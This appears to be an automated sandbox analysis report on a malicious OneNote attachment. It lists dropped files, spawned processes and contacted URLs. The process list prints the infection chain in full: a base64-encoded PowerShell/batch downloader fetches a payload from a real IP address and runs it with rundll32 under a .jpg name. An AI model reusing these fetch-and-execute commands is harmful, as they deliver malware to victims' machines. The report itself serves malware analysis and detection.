JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3
dropped
C:\Users\user\AppData\Local\Temp\{3295778F-48B3-452A-B1A6-A9F824F6FD87}
PNG image data, 40 x 623, 8-bit colormap, non-interlaced
dropped
C:\Users\user\AppData\Local\Temp\{35EB4E62-2397-4FAB-A2C8-BDD2175B93A1}
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Temp\{371D4139-BA06-4B16-BDF6-E08762F28C02}
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3
dropped
C:\Users\user\AppData\Local\Temp\{379DDDCE-FF3A-4B8A-AD72-EF4FD2D76FD9}
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Temp\{3C6D860C-D467-4CC3-9B36-6AE06D296131}
PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Local\Temp\{3D186B78-523A-4D92-9167-9462CDAAE1BB}
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:10:32], progressive, precision 8, 594x773, components 3
dropped
C:\Users\user\AppData\Local\Temp\{3E124E3B-E7B5-401A-8988-3ACAE8280837}
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Temp\{3F4AD35D-49A1-4812-936C-EE2A7CC0FFB7}
data
dropped
C:\Users\user\AppData\Local\Temp\{433BCC0C-0E64-47B8-8678-615C2FE0C06E}
data
dropped
C:\Users\user\AppData\Local\Temp\{4513737A-BEBA-4625-9715-D01556CD9D5B}
data
dropped
C:\Users\user\AppData\Local\Temp\{469EBF0F-7D0C-4CCB-B96B-0220A6325094}
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3
dropped
C:\Users\user\AppData\Local\Temp\{47738259-D11F-4703-9C7E-177AD0F39A5F}
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3
dropped
C:\Users\user\AppData\Local\Temp\{477ED6FB-EFCE-4D92-A5A9-7A479675E1B1}
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Temp\{495261FE-6E93-4A58-9DF5-EF6A58BC8655}
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Temp\{4A761C53-3673-43FD-AC5B-CF6EA0355BC0}
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Temp\{4D7F063C-55D1-4A4A-B756-C1934C3AA9B4}
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:26:15], progressive, precision 8, 216x792, components 3
dropped
C:\Users\user\AppData\Local\Temp\{4EBD424B-D83D-46F7-96CD-C0AD7F7F6923}
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Temp\{5093CB55-E877-472A-88CC-DBABD31BCB4E}
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Temp\{51915150-9592-49EF-94E7-62325AF7104D}
ASCII text, with very long lines (585), with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\{54BB7EBF-6ED9-4A6C-B038-1E96B5413044}
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Temp\{552D13F0-F233-4BE1-AC38-1DC723CA9058}
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Temp\{559F15B6-883A-469E-8802-82EDE448DA8B}
JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 728x77, components 3
dropped
C:\Users\user\AppData\Local\Temp\{57E38B0C-81D3-4C53-AF45-5D49B077A820}
data
dropped
C:\Users\user\AppData\Local\Temp\{59A6AFE0-FF25-4B73-AEFE-F0851EFB4A75}
JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 95x498, components 3
dropped
C:\Users\user\AppData\Local\Temp\{5FEDDC1E-D505-4938-8454-D436E6E5EF2D}
JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 613x144, components 3
dropped
C:\Users\user\AppData\Local\Temp\{609D7734-9D63-4A02-A6F1-2D1A3EB8E1B2}
PNG image data, 177 x 123, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Local\Temp\{616ABEFD-3B75-4D04-8360-F442DE4276DC}
PNG image data, 176 x 513, 8-bit colormap, non-interlaced
dropped
C:\Users\user\AppData\Local\Temp\{65D34C33-26BC-4983-8D6F-C7BDE65F9850}
PNG image data, 77 x 627, 8-bit colormap, non-interlaced
dropped
C:\Users\user\AppData\Local\Temp\{697A3135-2519-4F0A-A872-AAD0580F1D71}
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3
dropped
C:\Users\user\AppData\Local\Temp\{69863C97-F119-4250-B789-224C92162743}
JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 76x97, components 3
dropped
C:\Users\user\AppData\Local\Temp\{6BD58D71-F44F-4751-80D8-BA7F2C612BBB}
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Temp\{6F0B7D1E-57BF-4256-A523-1D3795F6D385}
JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 14x341, components 3
dropped
C:\Users\user\AppData\Local\Temp\{6F732945-CAA9-4569-BFF8-708159A2477F}
PNG image data, 30 x 700, 8-bit colormap, non-interlaced
dropped
C:\Users\user\AppData\Local\Temp\{7299E14D-3931-4B4D-9E69-3130515A4C44}
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Temp\{72E28A42-9E54-4E91-A581-6AC079457F1E}
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3
dropped
C:\Users\user\AppData\Local\Temp\{784E187E-9F5A-4DFD-8882-2A4103A016C9}
JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 700x114, components 3
dropped
C:\Users\user\AppData\Local\Temp\{7A1A2CDE-FB73-405E-B63D-164C29FB7209}
data
dropped
C:\Users\user\AppData\Local\Temp\{7A5BFED1-6EEA-42C6-9674-C56A189A4704}
JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 70x626, components 3
dropped
C:\Users\user\AppData\Local\Temp\{7CFD8F71-1902-4AC4-82C1-A49A9E057C29}
PNG image data, 39 x 579, 8-bit colormap, non-interlaced
dropped
C:\Users\user\AppData\Local\Temp\{812D5262-0733-4BD8-87C3-143DCB3E50F0}
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3
dropped
C:\Users\user\AppData\Local\Temp\{8293A8A4-6928-4F73-AD89-26C136846DE0}
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Temp\{85E646EF-94C9-4A9C-9939-5A5DCE409CCC}
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Temp\{88CAD5CB-A975-41B5-94C9-8194997F2532}
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:12:29], progressive, precision 8, 598x766, components 3
dropped
C:\Users\user\AppData\Local\Temp\{88E2CF14-E870-4D9E-A6A8-BE869E63D347}
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3
dropped
C:\Users\user\AppData\Local\Temp\{89099724-BA1D-42DC-B27D-75D5EFE888A1}
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Temp\{8A74C9CE-FCDD-4275-B8E6-C121F65A9012}
PNG image data, 813 x 99, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Local\Temp\{8CAAC281-5636-41C7-AEED-2E3FFBD830AF}
PNG image data, 1692 x 810, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Local\Temp\{8ED31C08-CFF6-4D56-BA94-4144874458A0}
JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 262x277, components 3
dropped
C:\Users\user\AppData\Local\Temp\{8F3BA076-04E9-4467-841B-0BE4B4245498}
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Temp\{95D25D58-648A-4D70-8F6D-81E929C2E2FD}
data
dropped
C:\Users\user\AppData\Local\Temp\{97DA42DA-7A9F-4DC6-B417-5A4D5193BC74}
JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 276x139, components 3
dropped
C:\Users\user\AppData\Local\Temp\{98AE4148-2C92-415B-A7FE-AA00A40841D4}
PNG image data, 40 x 650, 8-bit colormap, non-interlaced
dropped
C:\Users\user\AppData\Local\Temp\{98B57D6F-5569-4264-B02C-CDBADC76CB63}
PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Local\Temp\{9ABF207F-93A0-44E3-9F20-68A78BF12307}
data
dropped
C:\Users\user\AppData\Local\Temp\{9EED92C5-265F-473E-97AD-7859563323AC}
PNG image data, 3005 x 184, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Local\Temp\{9F631C80-C7E2-4A44-882E-10D02117ACB8}
data
dropped
C:\Users\user\AppData\Local\Temp\{A076A4AA-0F21-4C19-A9BB-E1B0F93829E6}
JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 780x107, components 3
dropped
C:\Users\user\AppData\Local\Temp\{A36EF572-E656-49E5-B865-3D3E16CEF1EE}
data
dropped
C:\Users\user\AppData\Local\Temp\{A3F3841D-B321-46B9-AAA2-9E853EC5A8F0}
data
dropped
C:\Users\user\AppData\Local\Temp\{A7CE9C20-6A07-4B9A-BC35-0D3B49C84FFF}
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Temp\{A907CBC0-8FC3-4B2F-B93E-10BA94BD8B4A}
PNG image data, 85 x 470, 8-bit colormap, non-interlaced
dropped
C:\Users\user\AppData\Local\Temp\{A9EFE9C7-D70C-4E98-A522-8FB825C2929B}
PNG image data, 60 x 336, 4-bit colormap, non-interlaced
dropped
C:\Users\user\AppData\Local\Temp\{AC2D9FB9-89F6-41B4-A8D6-EB9DCB357537}
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Temp\{AE22EE38-5231-4F83-9839-14CB3A5354DE}
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Temp\{B0887AA4-BD8D-4783-9530-69C1B7870BCB}
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3
dropped
C:\Users\user\AppData\Local\Temp\{B42ED10A-6299-4B61-9206-56865A5E7640}
PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Local\Temp\{B65DE754-875F-4951-8379-1F509291FAA7}
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:44:07], progressive, precision 8, 611x163, components 3
dropped
C:\Users\user\AppData\Local\Temp\{B7D82D9F-14A6-4A24-BE5F-509D71B15398}
data
dropped
C:\Users\user\AppData\Local\Temp\{BBA26BAC-B347-4D83-B272-A6F633B58186}
data
dropped
C:\Users\user\AppData\Local\Temp\{BBE4A5D5-CFE9-4562-86EE-5670CFE7CE25}
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Temp\{BC067B2D-586C-4DE5-A87C-458F85978F1D}
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Temp\{BC677E0A-193B-48C7-AA09-4939B211FABA}
PNG image data, 50 x 500, 8-bit colormap, non-interlaced
dropped
C:\Users\user\AppData\Local\Temp\{BD00DC09-53B2-4DAD-B2EC-13B58CDFA2C5}
JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 17x608, components 3
dropped
C:\Users\user\AppData\Local\Temp\{BDD6C401-BB8D-4110-9193-7150C248EFF1}
PNG image data, 1692 x 810, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Local\Temp\{BE1877FE-00BF-4972-90B0-2924B71138A7}
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Temp\{C01DD1B0-928C-4DD3-86DD-100D0A3B6F73}
data
dropped
C:\Users\user\AppData\Local\Temp\{C0BD47D2-7A33-4409-AF0F-4A33D174D3FA}
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Temp\{C3A5D077-638E-4AAB-906F-3F885441A6B5}
JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 814x105, components 3
dropped
C:\Users\user\AppData\Local\Temp\{C5A3962A-4AF7-4366-ACF9-E18FB4AA9EF3}
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Temp\{CACFC1E5-5A49-4A73-988F-FCFDE2A4D037}
data
dropped
C:\Users\user\AppData\Local\Temp\{CC297968-4B7E-404A-8D9A-3AD171C40DC1}
GIF image data, version 89a, 1012 x 327
dropped
C:\Users\user\AppData\Local\Temp\{CEE895D7-AE38-4AA2-90A3-579E7BDA6FF5}
JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 105x441, components 3
dropped
C:\Users\user\AppData\Local\Temp\{D5F0E9DD-FBD8-4953-B46C-F9DB7DA367DD}
JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 814x45, components 3
dropped
C:\Users\user\AppData\Local\Temp\{D70D490C-995A-4017-B34A-DBD1A2B3FDF2}
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:09:29], progressive, precision 8, 609x675, components 3
dropped
C:\Users\user\AppData\Local\Temp\{DAC9FA44-839F-46BD-83B7-97EC6BD42311}
PNG image data, 50 x 600, 8-bit colormap, non-interlaced
dropped
C:\Users\user\AppData\Local\Temp\{DD15B68C-1BA1-45A2-9D66-5D3A0D3069A2}
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Temp\{DD184555-86D6-45A9-A64B-30DF393AF2DE}
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:15:20], progressive, precision 8, 604x784, components 3
dropped
C:\Users\user\AppData\Local\Temp\{DE473569-C2F2-483E-B7EA-2C57CD640CC9}
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Temp\{E5124E2A-C74F-4E46-9927-4EF938DDECAB}
data
dropped
C:\Users\user\AppData\Local\Temp\{E59FADF5-B19E-4B91-85EF-9F2BBD40B8DE}
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Temp\{ECBD3809-8183-4203-BB37-67F10CC549D2}
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Temp\{EDCD2D85-91BB-46A5-8B2C-B857DAD2A1EC}
PNG image data, 171 x 552, 8-bit colormap, non-interlaced
dropped
C:\Users\user\AppData\Local\Temp\{F27ADCF0-AD5B-4BE4-88E7-900DC76AAB9D}
PNG image data, 50 x 556, 8-bit colormap, non-interlaced
dropped
C:\Users\user\AppData\Local\Temp\{F5856EBE-BC4D-44EB-8754-62BFCC264796}
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:13:06], progressive, precision 8, 570x779, components 3
dropped
C:\Users\user\AppData\Local\Temp\{F80736F3-1930-4BF1-9EDF-AE38719BE892}
PNG image data, 39 x 600, 8-bit colormap, non-interlaced
dropped
C:\Users\user\AppData\Local\Temp\{F8B18E42-6932-4257-98B6-79B814453535}
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Temp\{FB9A47E9-3FB6-4823-8DF3-D0C2E37A9C08}
data
dropped
C:\Users\user\AppData\Local\Temp\{FDDA8433-930D-4B3E-9CC9-2955644D64C2}
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\Open Notebook.onetoc2
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\Open Notebook.onetoc2
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Open Notebook.onetoc2
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\Open Notebook.onetoc2
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\Open Notebook.onetoc2
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\Open Notebook.onetoc2
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\Open Notebook.onetoc2
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\Open Notebook.onetoc2
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Open Notebook.onetoc2
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\1033\Open Notebook.onetoc2
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\Open Notebook.onetoc2
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Open Notebook.onetoc2
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\SmartArt Graphics\1033\Open Notebook.onetoc2
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\SmartArt Graphics\Open Notebook.onetoc2
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Word Document Bibliography Styles\Open Notebook.onetoc2
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Word Document Building Blocks\1033\Open Notebook.onetoc2
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Word Document Building Blocks\Open Notebook.onetoc2
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\Open Notebook.onetoc2
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\Open Notebook.onetoc2
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1bc9bbbe61f14501.customDestinations-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1bc9bbbe61f14501.customDestinations-ms~RF4246c.TMP (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6GXMU512HZTVYEZDXRLJ.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EIB5VIB2WA8LTFMLYOAT.temp
Matlab v4 mat-file (little endian) \253\373\277\272, sparse, rows 1, columns 0, imaginary
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Archive, Sparse, ctime=Wed Sep 22 09:27:59 2021, mtime=Tue Feb 7 19:02:00 2023, atime=Wed Sep 22 09:27:59 2021, length=180528, window=hide
dropped
C:\Users\user\Documents\OneNote Notebooks\My Notebook\Open Notebook.onetoc2
data
dropped
C:\Users\user\Documents\OneNote Notebooks\My Notebook\Quick Notes.one
data
dropped
There are 723 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
C:\Program Files\Microsoft Office\Root\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\Funds_160151.one
 malicious
C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE
/tsr
 malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Open.cmd" "
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe $atKUf9 = '62889e73828c756c961c5a6d6c01a463'; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnNldCBhMXlKRFJMUT1heHZnc0sNCnNldCBhTFF1Q1J5NT1hSG5CZFVNMg0Kc2V0IGFGZGl6SWtEdD1hYlBTNXENCnBvd2Vyc2hlbGwgKG5ldy1vYmplY3Qgc3lzdGVtLm5ldC53ZWJjbGllbnQpLmRvd25sb2FkZmlsZSgnaHR0cDovLzg3LjIzNi4xNDYuMzEvMzgxOTkuZGF0JywgJ0M6XHByb2dyYW1kYXRhXGdiLmpwZycpOw0Kc2V0IGFnTWFlM3BDPWF5YXUzDQpzZXQgYW1QdFVNY0E9YVJaamUNCmNhbGwgcnUlMWxsMzIgQzpccHJvZ3JhbWRhdGFcZ2IuanBnLFdpbmQNCmV4aXQNCg=='))
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Public\1.cmd nd
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (new-object system.net.webclient).downloadfile('http://87.236.146.31/38199.dat', 'C:\programdata\gb.jpg');
 malicious
C:\Windows\System32\rundll32.exe
rundll32 C:\programdata\gb.jpg,Wind
 malicious
C:\Windows\SysWOW64\rundll32.exe
rundll32 C:\programdata\gb.jpg,Wind
 malicious
C:\Windows\SysWOW64\backgroundTaskHost.exe
C:\Windows\SysWOW64\backgroundTaskHost.exe
 malicious
C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE
"C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE" /tsr
 malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 2 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://api.diagnosticssdf.office.com
unknown
https://outlook.live.com/owa/
unknown
https://login.microsoftonline.com/
unknown
https://www.onenote.com/?omkt=de-CH
unknown
https://shell.suite.office.com:1443
unknown
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
unknown
https://autodiscover-s.outlook.com/
unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
unknown
https://cdn.entity.
unknown
https://api.addins.omex.office.net/appinfo/query
unknown
https://clients.config.office.net/user/v1.0/tenantassociationkey
unknown
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
unknown
https://powerlift.acompli.net
unknown
https://rpsticket.partnerservices.getmicrosoftkey.com
unknown
https://lookup.onenote.com/lookup/geolocation/v1
unknown
https://cortana.ai
unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
unknown
https://api.powerbi.com/v1.0/myorg/imports
unknown
https://cloudfiles.onenote.com/upload.aspx
unknown
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
unknown
https://entitlement.diagnosticssdf.office.com
unknown
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
unknown
https://api.aadrm.com/
unknown
https://ofcrecsvcapi-int.azurewebsites.net/
unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
unknown
https://api.microsoftstream.com/api/
unknown
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
unknown
https://cr.office.com
unknown
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
unknown
https://cdnssl.clicktale.net/www32/ptc/05d32363-d534-4d93-9b65-cde674775e71.js
unknown
https://portal.office.com/account/?ref=ClientMeControl
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://graph.ppe.windows.net
unknown
https://res.getmicrosoftkey.com/api/redemptionevents
unknown
https://powerlift-frontdesk.acompli.net
unknown
https://start.microsoftapp.net/start?pc_campaign=UHF_Banner_15mkts&adjust=y9xgnyl_5sblqid"
unknown
https://tasks.office.com
unknown
https://officeci.azurewebsites.net/api/
unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work
unknown
https://api.scheduler.
unknown
https://my.microsoftpersonalcontent.com
unknown
https://onedrive.live.com/about/de-ch/
unknown
https://store.office.cn/addinstemplate
unknown
